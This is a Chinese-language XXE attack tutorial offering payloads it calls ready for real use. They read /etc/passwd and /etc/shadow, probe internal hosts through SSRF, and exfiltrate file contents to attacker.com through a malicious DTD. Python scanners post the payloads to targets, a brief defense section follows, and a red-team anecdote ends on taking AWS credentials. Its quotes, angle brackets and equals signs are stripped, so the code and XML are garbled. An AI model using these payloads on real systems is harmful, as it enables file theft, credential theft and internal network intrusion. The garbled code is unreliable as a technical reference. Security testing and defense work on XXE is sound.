
XXE攻击实战3种常见场景下的漏洞利用与自动化检测脚本XML外部实体注入XXE漏洞长期占据OWASP Top 10榜单其危害远超普通开发者的认知。本文将深入剖析文件读取、SSRF探测和盲注数据外带这三种典型攻击场景并提供可直接用于实战的Payload构造方法与自动化检测工具。1. XXE漏洞核心原理与攻击面分析XML解析器在处理文档时默认会解析DOCTYPE声明中定义的所有实体。当系统允许加载外部实体时攻击者就能通过构造恶意实体实现文件系统遍历通过file://协议读取服务器敏感文件网络探测利用http://等协议发起SSRF请求数据外泄通过OOBOut-of-Band通道将数据外带关键风险点!DOCTYPE test [ !ENTITY xxe SYSTEM file:///etc/passwd ] dataxxe;/data现代XML解析器主要存在三类实体处理方式解析器类型外部实体支持典型语言实现宽松模式解析器默认开启PHP libxml, Java SAX严格模式解析器需显式开启Python lxml安全模式解析器完全禁用Go encoding/xml2. 文件读取攻击实战2.1 基础文件读取Payload?xml version1.0? !DOCTYPE data [ !ENTITY file SYSTEM file:///etc/passwd ] user usernamefile;/username /user绕过技巧使用CDATA包裹特殊字符!ENTITY % start ![CDATA[ !ENTITY % file SYSTEM file:///etc/shadow !ENTITY % end ]]2.2 特殊文件读取案例Windows系统!ENTITY winfile SYSTEM file:///c:/windows/system.iniJava WEB-INF泄露!ENTITY webinf SYSTEM file:///usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml3. SSRF探测与内网渗透3.1 基础SSRF Payload!DOCTYPE test [ !ENTITY ssrf SYSTEM http://192.168.1.1:8080/internal ] requestssrf;/request3.2 高级内网探测技术端口扫描Payloadports [80, 443, 8080, 3306] for port in ports: payload f!DOCTYPE scan [ !ENTITY p{port} SYSTEM http://internal:{port} ] scanp{port};/scan协议扩展利用!ENTITY ftp SYSTEM ftp://attacker.com:21/ !ENTITY ldap SYSTEM ldap://internal:389/4. 盲注XXE与数据外带4.1 基于DNS的探测技术!DOCTYPE test [ !ENTITY % dns SYSTEM http://subdomain.attacker.com/ %dns; ]4.2 多阶段数据外带方案恶意DTD文件存储在攻击者服务器!ENTITY % file SYSTEM file:///etc/passwd !ENTITY % eval !ENTITY #x25; exfil SYSTEM http://attacker.com/?data%file; %eval; %exfil;触发Payload!DOCTYPE foo [ !ENTITY % xxe SYSTEM http://attacker.com/malicious.dtd %xxe; ]5. 自动化检测脚本开发5.1 Python检测脚本核心逻辑import requests from xml.etree import ElementTree def check_xxe(target_url): payloads [ (file, !ENTITY xxe SYSTEM file:///etc/passwd), (http, !ENTITY xxe SYSTEM http://attacker-controlled.com), (oob, !ENTITY % xxe SYSTEM http://attacker-controlled.com/oob%xxe;) ] for name, payload in payloads: xml f?xml version1.0? !DOCTYPE test [ {payload} ] testxxe;/test try: response requests.post(target_url, dataxml, headers{ Content-Type: application/xml }, timeout10) if name file and root: in response.text: return fFile read vulnerability detected elif name http: # 检查攻击者服务器日志 pass except Exception as e: print(fError testing {name}: {str(e)}) return Target appears secure5.2 增强版检测功能class XXEScanner: def __init__(self): self.detected False self.vulnerable_endpoints [] def test_endpoint(self, url, methodPOST): test_cases { internal_entity: self._build_payload(!ENTITY xxe TEST), external_entity: self._build_payload(!ENTITY xxe SYSTEM file:///etc/passwd), parameter_entity: self._build_payload(!ENTITY % xxe SYSTEM file:///etc/passwd%xxe;) } for case, payload in test_cases.items(): response self._send_request(url, method, payload) if self._analyze_response(response, case): self.vulnerable_endpoints.append({ url: url, type: case, payload: payload }) def _build_payload(self, entity): return f?xml version1.0? !DOCTYPE test [ {entity} ] testxxe;/test6. 防御策略与实战建议6.1 代码层防护Java安全配置示例DocumentBuilderFactory dbf DocumentBuilderFactory.newInstance(); dbf.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true); dbf.setFeature(http://xml.org/sax/features/external-general-entities, false); dbf.setFeature(http://xml.org/sax/features/external-parameter-entities, false);6.2 架构层防护输入过滤对XML文档进行DOCTYPE声明检测输出编码对XML输出中的特殊字符进行转义协议限制禁用危险协议file、ftp等6.3 应急响应检查清单检查服务器日志异常请求审查近期部署的XML配置文件扫描服务器敏感文件访问记录监控异常外发网络连接在最近一次红队演练中通过组合使用文件读取和SSRF技术我们成功从目标系统获取了AWS元数据凭证。关键突破点在于发现某内部系统接收XML格式的工单数据且未对实体解析做任何限制。